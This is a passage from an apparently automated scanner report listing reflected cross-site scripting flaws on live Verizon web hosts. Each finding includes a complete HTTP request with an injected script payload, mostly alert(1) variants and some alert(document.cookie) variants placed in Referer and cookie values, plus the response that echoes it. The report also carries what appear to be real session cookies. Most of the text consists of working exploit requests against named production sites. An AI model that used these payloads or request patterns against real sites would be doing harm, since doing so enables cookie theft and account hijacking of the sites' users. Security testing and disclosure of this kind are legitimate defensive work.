User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232329; expires=Tue, 13-Dec-2011 01:25:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:29 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110922

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_filesbc7cd<script>alert(1)</script>9cc0e2c7e09/embeds/js_slidingpanels_spry.js</strong>
...[SNIP]...

1.13. http://responsibility.verizon.com/persepolis/template_files/embeds/js_slidingpanels_spry.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_slidingpanels_spry.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 87f51<script>alert(1)</script>ec46c429446 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds87f51<script>alert(1)</script>ec46c429446/js_slidingpanels_spry.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232331; expires=Tue, 13-Dec-2011 01:25:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:31 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 111102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds87f51<script>alert(1)</script>ec46c429446/js_slidingpanels_spry.js</strong>
...[SNIP]...

1.14. http://responsibility.verizon.com/persepolis/template_files/embeds/js_slidingpanels_spry.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_slidingpanels_spry.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e0e0e<script>alert(1)</script>f316a71baf4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds/js_slidingpanels_spry.jse0e0e<script>alert(1)</script>f316a71baf4 HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232333; expires=Tue, 13-Dec-2011 01:25:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:34 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110969

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds/js_slidingpanels_spry.jse0e0e<script>alert(1)</script>f316a71baf4</strong>
...[SNIP]...

1.15. http://responsibility.verizon.com/persepolis/template_files/embeds/js_swfobject_2.2.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_swfobject_2.2.js

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5a0ff<script>alert(1)</script>8b53d8f4af8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis5a0ff<script>alert(1)</script>8b53d8f4af8/template_files/embeds/js_swfobject_2.2.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232329; expires=Tue, 13-Dec-2011 01:25:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:29 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis5a0ff<script>alert(1)</script>8b53d8f4af8/template_files/embeds/js_swfobject_2.2.js</strong>
...[SNIP]...

1.16. http://responsibility.verizon.com/persepolis/template_files/embeds/js_swfobject_2.2.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_swfobject_2.2.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e51be<script>alert(1)</script>3aac13647f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_filese51be<script>alert(1)</script>3aac13647f9/embeds/js_swfobject_2.2.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232331; expires=Tue, 13-Dec-2011 01:25:31 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:31 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110981

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_filese51be<script>alert(1)</script>3aac13647f9/embeds/js_swfobject_2.2.js</strong>
...[SNIP]...

1.17. http://responsibility.verizon.com/persepolis/template_files/embeds/js_swfobject_2.2.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_swfobject_2.2.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4d378<script>alert(1)</script>f228caa746e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds4d378<script>alert(1)</script>f228caa746e/js_swfobject_2.2.js HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232333; expires=Tue, 13-Dec-2011 01:25:33 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:34 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds4d378<script>alert(1)</script>f228caa746e/js_swfobject_2.2.js</strong>
...[SNIP]...

1.18. http://responsibility.verizon.com/persepolis/template_files/embeds/js_swfobject_2.2.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://responsibility.verizon.com
Path:	/persepolis/template_files/embeds/js_swfobject_2.2.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a7285<script>alert(1)</script>e97223d42ac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /persepolis/template_files/embeds/js_swfobject_2.2.jsa7285<script>alert(1)</script>e97223d42ac HTTP/1.1
Host: responsibility.verizon.com
Proxy-Connection: keep-alive
Referer: http://responsibility.verizon.com/images/vz_uploads/verizon_cr_report_2009-2010.pdfee0a6%3Cscript%3Ealert(document.cookie)%3C/script%3Ea6111243118
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; exp_last_visit=976871737; exp_last_activity=1292231737; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:25:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Set-Cookie: exp_last_activity=1292232335; expires=Tue, 13-Dec-2011 01:25:35 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A12%3A%22%2Fmain%2Ferror%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 13 Dec 2010 01:25:36 GMT
Pragma: no-cache
cache-control: private
Connection: close
Content-Type: text/html
Content-Length: 110954

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Verizon | Corpor
...[SNIP]...
<strong>http://responsibility.verizon.com/persepolis/template_files/embeds/js_swfobject_2.2.jsa7285<script>alert(1)</script>e97223d42ac</strong>
...[SNIP]...

1.19. http://www.verizonwireless.com/b2c/shoppingAssistant [phoneID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.verizonwireless.com
Path:	/b2c/shoppingAssistant

Issue detail

The value of the phoneID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload ad5b9%3balert(1)//6143396ea42 was submitted in the phoneID parameter. This input was echoed as ad5b9;alert(1)//6143396ea42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /b2c/shoppingAssistant?step=custType&item=phoneFirst&phoneID=ad5b9%3balert(1)//6143396ea42 HTTP/1.1
Host: www.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: STATE=NY; SESSION_VALUE=JB51NFqMgpp2ZT1010c4LkTNwwpcJRpGN165F6W2yKk4m29P1L4R!-1616894924!jagger!5102!-1!1292200684323; CARTVIEW=FALSE; __utmz=96859928.1290217110.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONIDB2C=JB51NFqMgpp2ZT1010c4LkTNwwpcJRpGN165F6W2yKk4m29P1L4R!-1616894924!jagger!5102!-1; TIME_CHECKER=1292200690206; ZIPCODE=10010; GLOBALID=Gz%2FEvEpqLXlWjN0JBQtocFAw%2FxYn5zkIiHwVedAP2GenfEoJGe6sl1Ton8E00phs; NSC_xxx_hwt=c7ef64540000; NSC_xxx_xmt_c2d_mcwt=44ad7f1725de; __utma=96859928.604975816.1290217110.1290217110.1292200678.2; CITY=New York; __utmc=96859928; __utmb=96859928;

Response

HTTP/1.1 200 OK
Date: Mon, 13 Dec 2010 01:03:23 GMT
Content-Length: 7975
Content-Type: text/html; charset=ISO-8859-1
X-Powered-By: Servlet/2.5 JSP/2.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head>
   <title>Shopping Cart</title>



...[SNIP]...
<script type="text/javascript">
   function continueshopping() {


           phoneFirst.addPhone('phoneFirst',ad5b9;alert(1)//6143396ea42, ,, function(data) {
       if(data.result){

           if(data.nextStep == 'serverError'){
               $('setError').set('html',data.errorMessage);
                   overlay.passFrameSize();
               docume
...[SNIP]...

1.20. http://www22.verizon.com/Content/LearnShop/intermediate.aspx [target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Content/LearnShop/intermediate.aspx

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36405'%3balert(1)//078e7b298a0 was submitted in the target parameter. This input was echoed as 36405';alert(1)//078e7b298a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Content/LearnShop/intermediate.aspx?target=https://36405'%3balert(1)//078e7b298a0 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 1943
Expires: Mon, 13 Dec 2010 00:47:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 00:47:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Shop For Ser
...[SNIP]...
<script>var url = 'https://36405';alert(1)//078e7b298a0'; document.form1.action=url;document.form1.submit();</script>
...[SNIP]...

1.21. http://www22.verizon.com/ForyourHome/Registration/Reg/OrLogin.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/ForyourHome/Registration/Reg/OrLogin.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81939"><script>alert(1)</script>6e2801d52eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ForyourHome/Registration/Reg/OrLogin.aspx?81939"><script>alert(1)</script>6e2801d52eb=1 HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; NSC_xxx22_tqmbu_mcw=ffffffff895bc66945525d5f4f58455e445a4a423660; RVServiceLocation=TX; BTagRequired=N; showpromo=N; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; refURL=http://www22.verizon.com/NROneRetail/NR/exeres/0ECAE15E-8F92-465E-B27B-6897F0CAB2C4,frameless.htm#; VzApps=STATE=TX; canigetfios=Y; ContextInfo_State=TX68a71<script>alert(document.cookie)</script>da0afcb6a72; Source=CHSI; myservices=vzdock=N; BusinessUnit=residential; autosuggest=on; V347=0; CP=null*; ASP.NET_SessionId=y44x4rr1epl4it451swfoua3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA07V
Content-Type: text/html; charset=utf-8
Content-Length: 47344
Expires: Mon, 13 Dec 2010 01:01:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:01:10 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=10f523ea-2c91-4b43-b88c-339efadf29f6; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc65c45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Verizon | Sign In</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta
...[SNIP]...
<INPUT type="hidden" value="/sso/redirect/redirect.asp?Target=https://www22.verizon.com/ForyourHome/GoFlow/MyVerizon/RegistrationBridge.aspx?FlowRoute=AMFBAU&81939"><script>alert(1)</script>6e2801d52eb=1" name="target">
...[SNIP]...

1.22. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [CMP parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx

Issue detail

The value of the CMP request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 30a22'-alert(1)-'35cda77ca6a was submitted in the CMP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X00430a22'-alert(1)-'35cda77ca6a HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.verizon.com/value
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V347=0; myservices=vzdock=N; AimsChatURL_Cookie=https://collaborateext.verizon.com; vzapps=STATE=TX; vzpers=STATE=TX; vsrecentsearches=%26%2339%3b~~~~; BusinessUnit=business; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; WT_FPC=id=2b7981012e2b18a022b1292201505722:lv=1292201657068:ss=1292201505722; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
MyVzServer: GWA25V
Content-Type: text/html; charset=utf-8
Expires: Mon, 13 Dec 2010 01:25:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 13 Dec 2010 01:25:03 GMT
Connection: close
Set-Cookie: RegistrationApp=SessionId=51aa4324-b12b-47e2-a488-306dfded9345; domain=.verizon.com; path=/
Set-Cookie: VZGEO=west; domain=.verizon.com; path=/
Set-Cookie: NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660;path=/
Set-Cookie: ak-sf=false; expires=Mon, 13-Dec-2010 01:30:03 GMT; path=/foryourhome/myaccount/; domain=verizon.com
Content-Length: 131502

<SCRIPT language=javascript>function checkforempty()
           {

               var frm = document.formLogin;
               uid = frm.UserId.value;
               pass = frm.Password.value;

               if ( uid.length =
...[SNIP]...

var pageUrl = 'http://www22.verizon.com:80/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx?_nfpb=true&_pageLabel=vzc_help_announcement&id=perks&CMP=DMC-CVD_ZZ_ZZ_Z_DO_N_X00430a22'-alert(1)-'35cda77ca6a';
if (pageUrl.indexOf('err=') != -1) {
openPopup('User Message(s)', document.all ? 453 : 453, 'PsswdMismatch');
document.getElementById('PopOK').focus();
}
...[SNIP]...

1.23. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx [_nfpb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
